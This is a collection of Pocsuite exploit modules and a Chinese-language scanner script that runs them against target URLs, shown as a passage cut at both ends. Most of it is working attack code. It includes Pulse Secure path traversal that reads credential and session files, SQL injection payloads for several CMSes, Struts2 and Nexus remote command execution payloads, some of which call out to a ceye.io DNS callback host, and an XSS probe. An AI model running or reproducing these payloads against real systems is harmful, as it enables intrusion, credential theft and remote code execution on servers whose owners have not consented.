            pass
        return self.parse_output(result)

    def get_hosts(self):
        payload = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/"
        headers = {"User-Agent": "Mozilla/5.0",
                   "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                   "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close",
                   "Upgrade-Insecure-Requests": "1"}
        try:
            res = req.get(self.url + payload, verify=False, headers=headers, timeout=(10, 15))
            return res.text
        except Exception as e:
            return None

    def get_user_password(self):
        payload_palntext_passwd = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?" \
                                  "/dana/html5acc/guacamole/"
        payload_user_hash = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/system?" \
                            "/dana/html5acc/guacamole/"

        headers = {"User-Agent": "Mozilla/5.0",
                   "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                   "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close",
                   "Upgrade-Insecure-Requests": "1"}
        try:
            plantextpasswd = req.get(self.url + payload_palntext_passwd, verify=False, headers=headers,
                                     timeout=(10, 15)).text
        except Exception as e:
            plantextpasswd = ''
        try:
            userhash = req.get(self.url + payload_user_hash, verify=False, headers=headers, timeout=(10, 15)).text
        except Exception as e:
            userhash = ''
        return plantextpasswd, userhash

    def get_session(self):
        payload = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/" \
                  "data.mdb?/dana/html5acc/guacamole/"
        headers = {"User-Agent": "Mozilla/5.0",
                   "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                   "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close",
                   "Upgrade-Insecure-Requests": "1"}
        try:
            res = req.get(self.url + payload, verify=False, headers=headers, timeout=(10, 15))
            return res.text
        except Exception as e:
            return ""

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
#coding:utf-8

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class CmsEasyPoc(POCBase):
    vulID = "104"
    version = "1"
    author = "guouopp"
    vulDate = "2018-10-04"
    createDate = "2018-10-04"
    updateDate = "2018-10-04"
    references = ['https://www.seebug.org/vuldb/ssvid-94004']
    name = "CmsEasy header SQL Injection"
    appPowerLink = "http://localhost/cmseasy/"
    appName = "CmsEasy"
    appVersion = "5.5"
    vulType = "SQL Injection"
    desc = '''
        前台在线客服功能页面，xajaxargs参数没有过滤，可进行POST注入
    '''
    samples = []
    install_requires = []

    def _verify(self):
        result = {}
        vul_url = self.url + '/celive/live/header.php'
        payload = {
            'xajax':'LiveMessage',
            'xajaxargs[0][name]':"1',(SELECT 1 FROM (select count(*),concat("
                                  "floor(rand(0)*2),(select md5(233)))a from "
                                  "information_schema.tables group by a)b),"
                                  "'','','','1','127.0.0.1','2') #"
        }
        
        response = req.post(vul_url,data=payload,timeout=30).content
        if 'e165421110ba03099a1c0393373c5b43' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url

        return self.parse_attack(result)


    def _attack(self):
        return self._verify()

    def parse_attack(self,result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail("Internet nothing returned")
        return output
        
register(CmsEasyPoc)



#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = '74cms 3.2 ajax_officebuilding.php sql injection'
    vulID = '0'
    author = ['LRestless']
    vulType = 'sql-inj'
    version = '1'
    references = ['https://shuimugan.com/bug/view?bug_no=63225']
    desc = '''74cms 3.2  ajax_officebuilding.php sql injection'''

    vulDate = '2014-09-03'
    createDate = '2019-03-29'
    updateDate = '2019-03-29'

    appName = '74cms'
    appVersion = '3.2'
    appPowerLink = 'http://www.74cms.com'
    samples = ['re']

    def _attack(self):
        """attack mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
        self.url = self.url.strip('/') + "/plus/ajax_officebuilding.php"
        payload1 = "?act=key&key=asd%E9%8C%A6%27 /*!50000union*/ /*!50000select*/ 1,2,3,concat(0x7e,database(),0x7e),5,6,7,version(),9%23"
        url1 = self.url + payload1
        resp1 = s.get(url1)
        dbname1 = re.search('~(.*?)~', resp1.content)
        if dbname1:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['Database'] = {}
            result['Database']['DBname'] = dbname1.group(1)
        return self.parse_output(result)

    def _verify(self):
        """verify  mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
        self.url = self.url.strip('/') + "/plus/ajax_officebuilding.php"
        payload1 = "?act=key&key=asd%E9%8C%A6%27 /*!50000union*/ /*!50000select*/ 1,2,3,md5(1),5,6,7,version(),9%23"
        url1 = self.url + payload1
        resp1 = s.get(url1)
        time.sleep(2)
        if 'c4ca4238a0b923820dcc509a6f75849b' in resp1.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '00004'
    version = '1.0'
    author = ['jeffzhang']
    vulDate = '2017-09-28'
    createDate = '2017-09-28'
    updateDate = '2017-09-28'
    references = ['']
    name = 'Struts2-045 命令执行漏洞'
    appPowerLink = 'http://www.phpMyAdmin.com/'
    appName = 'Apache Struts'
    appVersion = '<=2.3.32'
    vulType = 'RCE'
    desc = '''
    程攻击者可通过发送恶意的数据包在受影响服务器上执行任意命令
    '''
    samples = ['']

    def _attack(self):
        return self._verify()

    def _verify(self):
        result = {}
        command = "echo 89aifh76ftq4fu38yfq498yf"
        payload = "Content-Type:%{(#_='multipart/form-data')."
        payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
        payload += "(#_memberAccess?"
        payload += "(#_memberAccess=#dm):"
        payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
        payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
        payload += "(#ognlUtil.getExcludedPackageNames().clear())."
        payload += "(#ognlUtil.getExcludedClasses().clear())."
        payload += "(#context.setMemberAccess(#dm))))."
        payload += "(#cmd='%s')." % command
        payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
        payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
        payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
        payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
        payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
        payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
        payload += "(#ros.flush())}"
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}

        response = req.post(self.url, headers=headers)
        if "89aifh76ftq4fu38yfq498yf" in response.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = response.url
        return self.parse_output(result)

    def parse_output(self, result):
        # parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



import os
from termcolor import cprint
import sys

try:
    import cvpoc
except ImportError:
    sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
from cvpoc.cv import verify_poc
from cvpoc import __version__
import logging

SITE_ROOT = os.path.dirname(os.path.abspath(__file__))
LOGO = """
      /$$$$$$$ /$$    /$$ /$$$$$$   /$$$$$$   /$$$$$$$
     /$$_____/|  $$  /$$//$$__  $$ /$$__  $$ /$$_____/
    | $$       \  $$/$$/| $$  \ $$| $$  \ $$| $$      
    | $$        \  $$$/ | $$  | $$| $$  | $$| $$      
    |  $$$$$$$   \  $/  | $$$$$$$/|  $$$$$$/|  $$$$$$$
     \_______/    \_/   | $$____/  \______/  \_______/
                        | $$                          
                        | $$                          
                        |__/                          
            """
# 版本号
VERSION = 'v%s' % __version__


class HiddenPrints:
    def __enter__(self):
        logging.disable(logging.CRITICAL)

        self._original_stdout = sys.stdout
        sys.stdout = open(os.devnull, 'w')

        self._original_stderr = sys.stderr
        sys.stderr = open(os.devnull, 'w')

    def __exit__(self, exc_type, exc_val, exc_tb):
        logging.disable(logging.DEBUG)

        sys.stdout.close()
        sys.stdout = self._original_stdout

        sys.stderr.close()
        sys.stderr = self._original_stderr


def logo_banner():
    usage = LOGO + '''
                                                    %s
                                                    ''' % VERSION
    cprint(usage, "cyan")


def help_banner():
    usage = '''
                极光漏扫，所向披靡!
        opt:
        ---------------------------------------------------
        -h              Get help
        -t              Target
        -l              List avalible pocs
        -s              Search poc key words
        -m              Use poc module
        -f              Load urls file
        -d              set header Host name
        ---------------------------------------------------
        Usage:  
        1.python3 poc.py -l 列出所有poc
        2.python3 poc.py -t http://www.example.com 对url执行所有poc检测(暴力)
        3.python3 poc.py -t http://www.example.com -d baidu.com 对url执行所有poc检测(暴力,设置header)
        4.python3 poc.py -s thinkphp  搜索出thinkphp的相关poc
        5.python3 poc.py -s thinkphp -t http://www.example.com 单一目标执行漏洞检测(针对搜索到的poc)
        6.python3 poc.py -s thinkphp -t http://www.example.com -d baidu.com 单一目标执行漏洞检测(针对搜索到的poc,设置header)
        7.python3 poc.py -m thinkphp_rce2|thinkphp_rce2.py|绝对路径 -t http://www.example.com 单一目标执行漏洞检测
        8.python3 poc.py -m thinkphp_rce2|thinkphp_rce2.py|绝对路径 -t http://www.example.com -d baidu.com 单一目标执行漏洞检测（设置header）
        9.python3 poc.py -m thinkphp_rce2|thinkphp_rce2.py|绝对路径 -f url.txt(默认与该文件在同一目录)|绝对路径 对url.txt中的所有url执行漏洞检测 
        '''
    cprint(usage, "cyan")


def get_all_poc_list():
    # 列出所有poc名称
    poc_file1 = os.path.join(SITE_ROOT, 'easy_pocs')
    poc_file2 = os.path.join(SITE_ROOT, 'cv_pocs')
    poc_file3 = os.path.join(SITE_ROOT, 'pocsuite_pocs')
    poc_list = []
    for file_name in os.listdir(poc_file1):
        if file_name != '__init__.py' and file_name.endswith('.py'):
            poc_list.append(('easy_pocs', file_name))
    for file_name in os.listdir(poc_file2):
        if file_name != '__init__.py' and file_name.endswith('.py'):
            poc_list.append(('cv_pocs', file_name))
    for file_name in os.listdir(poc_file3):
        if file_name != '__init__.py' and file_name.endswith('.py'):
            poc_list.append(('pocsuite_pocs', file_name))
    return poc_list


def get_poc_files(poc):
    poc_file_list = []
    if os.path.isfile(poc):
        poc_file = poc
        if os.path.exists(poc_file):
            poc_file_list.append(poc_file)
    else:
        poc = poc.split('.py')[0] + '.py'
        current_path = os.getcwd()
        if os.path.exists(os.path.join(current_path, poc)):
            poc_file_list.append(os.path.join(current_path, poc))
        else:
            for k in ['easy_pocs', 'cv_pocs', 'pocsuite_pocs']:
                if os.path.exists(os.path.join(SITE_ROOT, k, poc)):
                    poc_file_list.append(os.path.join(SITE_ROOT, k, poc))
    if len(poc_file_list) == 0:
        cprint("-m 文件不存在或者文件路径不对", "red")
    return poc_file_list


def main():
    logo_banner()
    if len(sys.argv) < 2 or sys.argv[1] == "-h":
        help_banner()
    elif sys.argv[1] == "-l":
        # 列出所有poc名称
        poc_list = get_all_poc_list()
        cprint("total:", "blue")
        cprint(len(poc_list), 'red')
        cprint("=" * 30, "blue")
        for index, poc in enumerate(poc_list):
            cprint('%s-%s-%s' % (index + 1, poc[0], poc[1]), "red")
        cprint("=" * 30, "blue")
    elif len(sys.argv) >= 3 and sys.argv[1] == "-s" and sys.argv[2]:
        # 搜索相关的poc
        key = sys.argv[2].strip()
        # 列出所有poc名称
        poc_list = get_all_poc_list()
        if len(sys.argv) >= 5 and sys.argv[3] == '-t' and sys.argv[4]:
            target = sys.argv[4].strip()
            header = {}
            if len(sys.argv) >= 7 and sys.argv[5] == '-d' and sys.argv[6]:
                header = {'Host': sys.argv[5].strip()}

            count = 0
            for poc in poc_list:
                if key in poc[1]:

                    poc_file = os.path.join(SITE_ROOT, poc[0], poc[1])
                    config = {
                        'url': [target],
                        'poc': poc_file,
                    }
                    if header:
                        config['http_headers'] = header
                    with HiddenPrints():
                        try:
                            result = verify_poc(config)
                        except:
                            result = 'failed'

                    if result == 'success':
                        count += 1
                        cprint("%s-%s-%s" % (count, poc[0], poc[1]), 'yellow')
                        cprint("命中", "red")
            if count == 0:
                cprint("没有命中漏洞", "blue")
        else:
            count = 0
            for poc in poc_list:
                if key in poc[1]:
                    count += 1
                    cprint("%s-%s-%s" % (count, poc[0], poc[1]), 'yellow')

    elif len(sys.argv) >= 5 and sys.argv[1] == "-m" and sys.argv[3] == "-t":
        poc = sys.argv[2].strip()
        target = sys.argv[4].strip()
        poc_files = get_poc_files(poc)
        for poc in poc_files:
            config = {
                'url': [target],
                'poc': poc,
            }

            # 设置请求头 Host
            try:
                if sys.argv[5] == "-d" and sys.argv[6]:
                    config['http_headers'] = {'Host': sys.argv[5].strip()}
            except:
                pass

            cprint(poc, "yellow")
            with HiddenPrints():
                try:
                    result = verify_poc(config)
                except:
                    result = 'failed'

            if result == 'success':
                cprint("命中", "red")
            else:
                cprint("没有命中", "blue")
    elif len(sys.argv) >= 5 and sys.argv[1] == "-m" and sys.argv[3] == "-f":
        url_file = sys.argv[4].strip()
        poc = sys.argv[2].strip()

        poc_files = get_poc_files(poc)
        for poc in poc_files:
            cprint(poc, "yellow")
            try:
                with open(url_file, 'r') as f:
                    for line in f.readlines():
                        line = line.strip()
                        if not line:
                            continue
                        cprint(line, "green")

                        try:
                            link = line.split(' ')[0]
                            header = {'Host': link[1].strip()}
                        except:
                            header = {}

                        config = {
                            'url': [link],
                            'poc': poc,
                        }
                        if header:
                            config['http_headers'] = header
                        with HiddenPrints():
                            try:
                                result = verify_poc(config)
                            except:
                                result = 'failed'

                        if result == 'success':
                            cprint("命中", "red")
                        else:
                            cprint("没有命中", "blue")
            except FileNotFoundError:
                cprint("-f 文件不存在或者文件路径不对", "red")

    elif len(sys.argv) >= 3 and sys.argv[1] == '-t' and sys.argv[2]:
        target = sys.argv[2].strip()
        poc_list = get_all_poc_list()
        header = {}
        if len(sys.argv) >= 5 and sys.argv[3] == '-d' and sys.argv[4]:
            header = {'Host': sys.argv[5].strip()}
        count = 0
        for poc in poc_list:
            count += 1
            cprint("%s-%s-%s" % (count, poc[0], poc[1]), 'yellow')
            poc_file = os.path.join(SITE_ROOT, poc[0], poc[1])
            config = {
                'url': [target],
                'poc': poc_file,
            }
            if header:
                config['http_headers'] = header
            with HiddenPrints():
                try:
                    result = verify_poc(config)
                except:
                    result = 'failed'

            if result == 'success':
                cprint("命中", "red")
            else:
                cprint("没有命中", "blue")
    else:
        help_banner()


if __name__ == "__main__":
    main()



"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, get_listener_ip, get_listener_port, \
    VUL_TYPE
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.utils import random_str, generate_shellcode_list
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import REVERSE_PAYLOAD


class DemoPOC(POCBase):
    vulID = '0'  # ssvid
    version = '1.0'
    author = ['funny']
    vulDate = '2019-12-7'
    createDate = '2019-12-7'
    name = 'Spring boot Actuator jolokia 远程代码执行漏洞'
    appPowerLink = 'http://www.jolokia.org/'
    appName = 'Spring boot Actuator jolokia'
    appVersion = 'spring boot1.4该配置默认开启,1.5版本之后默认关闭'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''Spring Boot Acuator 可以帮助你监控和管理Spring Boot应用,jolokia 是一个实现JMX的开源项目，
                但是在spring boot中，利用jolokia配置不当可以实现远程命令执行'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP

    # def _check(self, url):
    #     flag = 'PHP Extension Build'
    #     data = "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
    #
    #     payloads = [
    #         r"/index.php?s=captcha"
    #     ]
    #     for payload in payloads:
    #         vul_url = url + payload
    #         headers = {
    #             "Content-Type": "application/x-www-form-urlencoded"
    #         }
    #         r = requests.post(vul_url, data=data, headers=headers)
    #
    #         if flag in r.text:
    #             return payload, data
    #     return False

    def _verify(self):
        result = {}
        # p = self._check(self.url)
        # if p:
        #     result['VerifyInfo'] = {}
        #     result['VerifyInfo']['URL'] = p[0]
        #     result['VerifyInfo']['Postdata'] = p[1]

        return self.parse_output(result)

    def _attack(self):
        result = {}

        payload = "/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:8080!/logback.xml"
        vul_url = self.url + payload
        headers = {
            "Content-Type": "application/x-www-form-urlencoded"
        }
        logger.info("url: {}".format(vul_url))
        r = requests.get(vul_url, headers=headers)
        if r.status_code == 200:
            result['ShellInfo'] = {}
            result['ShellInfo']['Content'] = r.text
        return self.parse_output(result)

    # def _shell(self):
    #     vulurl = self.url + "/index.php?s=captcha"
    #     # 生成写入文件的shellcode
    #     _list = generate_shellcode_list(listener_ip=get_listener_ip(), listener_port=get_listener_port(),
    #                                     os_target=OS.WINDOWS,
    #                                     os_target_arch=OS_ARCH.X64)
    #     for i in _list:
    #         data = {
    #             '_method': '__construct',
    #             'filter[]': 'system',
    #             'method': 'get',
    #             'server[REQUEST_METHOD]': i
    #         }
    #         headers = {
    #             "Content-Type": "application/x-www-form-urlencoded"
    #         }
    #         requests.post(vulurl, data=data, headers=headers)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



#!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
from urlparse import urljoin

class TestPOC(POCBase):
    vulID = 'SSV-86055'  # vul ID
    version = '1'
    author = 'hhxx'
    vulDate = '2009-02-09'
    createDate = '2015-10-22'
    updateDate = '2015-10-22'
    references = ['https://www.exploit-db.com/exploits/32782/']
    name = "FotoWeb 6.0 Login.fwx s Parameter XSS"
    appPowerLink = 'www.fotoware.com'
    appName = 'FotoWeb'
    appVersion = '6.0'
    vulType = 'XSS'
    desc = '''  
        FotoWeb 是针对网站发布内容包括文档、图片、pdf、视频等实现归档的工具。 
        FotoWeb 6.0 (Build 273)版本中存在多个跨站脚本攻击漏洞。
        远程攻击者可以借助(1)对cmdrequest/Login.fwx的s参数和(2)对Grid.fwx的搜索参数，
        注入任意web脚本或HTML。
        CVEID:CVE-2009-0573
        CNNVDID:CNNVD-200902-327
    '''
    # the sample sites for examine
    samples = ['']

    def _verify(self):
        payload = '/fotoweb/cmdrequest/Login.fwx?s="><script>alert(/Sebug23333Test/)</script>'
        res = req.get(urljoin(self.url, payload), timeout=5)
        return self.parse_verify(res, payload, 'xss')

    def parse_verify(self, res, payload, type):
        output = Output(self)
        result = {}
        if  type == 'xss' and '>alert(/Sebug23333Test/)' in res.content:
            #返回页面包含构造的特殊字段，说明xss存在
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = urljoin(self.url, payload)
            output.success(result)           
        else:
            output.fail('Internet Nothing returned')
        return output

    def _attack(self): 
        return self._verify()

register(TestPOC)


#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = '08cms_v5.0 -  SQL Injection'
    vulID = '0'
    author = ['LRestless']
    vulType = 'sql-inj'
    version = '1'
    references = ['https://shuimugan.com/bug/view?bug_no=110861']
    desc = '''08cms_v5.0  info.php的tblprefix存在注入'''

    vulDate = '2015-06-18'
    createDate = '2019-03-19'
    updateDate = '2019-03-20'

    appName = '08cms'
    appVersion = '5.0'
    appPowerLink = 'http://www.08cms.com/product'
    samples = ['re']

    def _attack(self):
        """attack mode"""
        return self._verify()

    def _verify(self):
        """verify  mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
        self.url = self.url + '/info.php?fid=1&tblprefix=cms_msession'
        payload1 = '/**/where/**/1/**/and/**/updatexml(1,concat(0x37,(select/**/'
        paylaod2 = '/**/limit/**/0,1)),1)%23'
        flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0,8))
        flag = flag.lower()
        geturl = self.url + payload1 + flag + paylaod2
        resp = s.get(geturl)
        con = re.search(flag, resp.text)
        time.sleep(2)
        if con:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/env python
# _*_ encoding：utf-8 _*_

from pocsuite3.api import POCBase
from pocsuite3.api import register_poc
from pocsuite3.api import Output
from collections import OrderedDict
from pocsuite3.api import OptString
from pocsuite3.api import requests
from pocsuite3.lib.utils import random_str

class Struts2(POCBase):
    vulID = ''
    version = '1.0'
    author = ['big04dream']
    vulDate = '2018-08-24'
    createDate = '2020-07-01'
    updateDate = '2020-07-01'
    references = ['']
    name = 'Apache Struts2 远程代码执行漏洞 (S2-053/CVE-2017-12611)'
    appPowerLink = 'https://struts.apache.org/'
    appName = 'Struts2'
    appVersion = 'Struts 2.0.1 - Struts 2.3.33, Struts 2.5 - Struts 2.5.10'
    vulType = 'rce'
    desc = '''
    Apache Struts2 远程代码执行漏洞 (S2-053/CVE-2017-12611)
    '''

    def _verify(self):
        result = {}
        try:
            cmd = random_str(16) + '.6eb4yw.ceye.io'
            cmd2 = 'ping ' + cmd
            params = {
                "redirectUri": "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" + cmd2 + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}" + "\n"
            }
            r = requests.post(self.url, params=params, headers=self._headers)
            if r.status_code == 200:
                res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
                if cmd in res:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
                    result['VerifyInfo']['Payload'] = params
        except:
            pass
        return self.parse_output(result)

    @property
    def _headers(self):
        headers = {
            'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Referer': self.url,
            'Connection':'close',
            'Cookie':'JSESSIONID=E25862AE388D006049EA9D3CEF12F246',
            'Upgrade-Insecure-Requests':'1',
            'Cache-Control':'max-age=0'
        }
        return headers

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output

register_poc(Struts2)


#!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class CmsEasyPoC(POCBase):
    vulID = '88979'
    version = '1'
    author = 'Medici.Yan'
    vulDate = '2014-10-22'
    createDate = '2015-12-28'
    updateDate = '2015-12-28'
    references = ['http://wooyun.org/bugs/wooyun-2010-070827']
    name = 'CMSEasy 5.5 /celive/live/header.php SQL注入漏洞 POC'
    appPowerLink = 'http://www.cmseasy.cn/'
    appName = 'CMSEasy'
    appVersion = '5.5'
    vulType = 'SQL Injection'
    desc = '''
           开发人员在修补漏洞的时候只修复了少数的变量而遗漏了其他变量，使其他变量直接
           带入了SQL语句中，可以通过\字符来转义掉一个单引号，逃逸单引号，产生SQL注入。
           此注入为报错注入，可以通过UpdateXML函数进行注入。
    '''
    samples = ['']

    def _verify(self):
        result = {}
        target = self.url + '/celive/live/header.php'
        post_data = {
            'xajax': 'LiveMessage',
            'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat("
                                  "floor(rand(0)*2),(select md5(233)))a from "
                                  "information_schema.tables group by a)b),"
                                  "'','','','1','127.0.0.1','2') #"
        }
        # 使用 requests 发送 post 请求
        response = req.post(target, data=post_data, timeout=10)
        content = response.content
        # 这个 e165421110ba03099a1c0393373c5b43 就是 md5(233) 的值
        if 'e165421110ba03099a1c0393373c5b43' in content:
            result = {'VerifyInfo': {}}
            result['VerifyInfo']['URL'] = target

        return self.parse_result(result)

    def _attack(self):
        return self._verify()

    def parse_result(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')

        return output


register(CmsEasyPoC)


#!/usr/bin/env python
# _*_ encoding：utf-8 _*_

from pocsuite3.api import POCBase
from pocsuite3.api import register_poc
from pocsuite3.api import Output
from collections import OrderedDict
from pocsuite3.api import OptString
from pocsuite3.api import requests
from pocsuite3.lib.utils import random_str
import json

class Nexus(POCBase):
    vulID = ''
    version = '1.0'
    author = ['big04dream']
    vulDate = '2020-04-02'
    createDate = '2020-06-30'
    updateDate = '2020-06-30'
    references = ['']
    name = 'Nexus Manager 3 远程命令执行漏洞'
    appPowerLink = 'https://oss.sonatype.org/'
    appName = 'Nexus Repository Manager OSS/Pro 3.x'
    appVersion = 'Nexus Repository Manager OSS/Pro version <= 3.21.1 '
    vulType = 'rce'
    desc = '''
    Nexus Manager 3 远程命令执行漏洞（CVE-2020-10199)
    '''

    def _options(self):
        o = OrderedDict()
        o['sessionid'] = OptString('', description='current nexus session id', require=False)
        o['csrftoken'] = OptString('', description='current nexus csrf token', require=False)
        return o

    def _verify(self):
        result = {}
        try:
            target = self.url + '/service/rest/beta/repositories/go/group'
            cmd = random_str(16) + '.6eb4yw.ceye.io'
            cmd2 = 'ping ' + cmd
            payload = "$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('%s')}" % cmd2
            data = {
                "name": "internal",
                "online": "true",
                "storage": {
                    "blobStoreName": "default",
                    "strictContentTypeValidation": "true"
                },
                "group": {
                    "memberNames": [payload]
                }
            }
            requests.post(target, data=json.dumps(data), headers=self._headers)
            res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
            if cmd in res:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target
                result['VerifyInfo']['Payload'] = payload
        except:
            pass
        return self.parse_output(result)

    @property
    def _headers(self):
        headers = {
            "Host": "%s" % self.url,
            "Referer": self.url,
            "X-Nexus-UI": "true",
            "X-Requested-With": "XMLHttpRequest",
            "NX-ANTI-CSRF-TOKEN": self.get_option('csrftoken'),
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0",
            "Accept": "application/json, text/plain, */*",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/json",
            "Cookie": "NX-ANTI-CSRF-TOKEN=%s; NXSESSIONID=%s" % (self.get_option('csrftoken'), self.get_option('sessionid')),
            "Origin": self.url,
            "Connection": "close"
        }
        return headers

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output

register_poc(Nexus)


#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = 'anmai /anmai/SF_Mange/tfdeleN.aspx sql injection'
    vulID = '0'
    author = ['LRestless']
    vulType = 'sql-inj'
    version = '1'
    references = ['https://shuimugan.com/bug/view?bug_no=106896']
    desc = '''anmai anmai/SF_Manage/tfdeleN.aspx  的 tfid 参数报错注入'''

    vulDate = '2015-04-13'
    createDate = '2019-04-11'
    updateDate = '2019-04-11'

    appName = 'anmai'
    appVersion = '正式版'
    appPowerLink = 'http://www.anmai.net/'
    samples = ['re']

    def _attack(self):
        """attack mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
        self.url = self.url.strip('/') + "/anmai/SF_Manage/tfdeleN.aspx"
        payload = "?tfid=%28SELECT%20%20CHAR%28126%29%2bDB_NAME%28%29%2bCHAR%28126%29%29"
        url = self.url + payload
        resp = s.get(url)
        dbname = re.search('~(.*?)~', resp.content)
        if dbname:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['Database'] = {}
            result['Database']['DBname'] = dbname.group(1)
        return self.parse_output(result)

    def _verify(self):
        """verify  mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
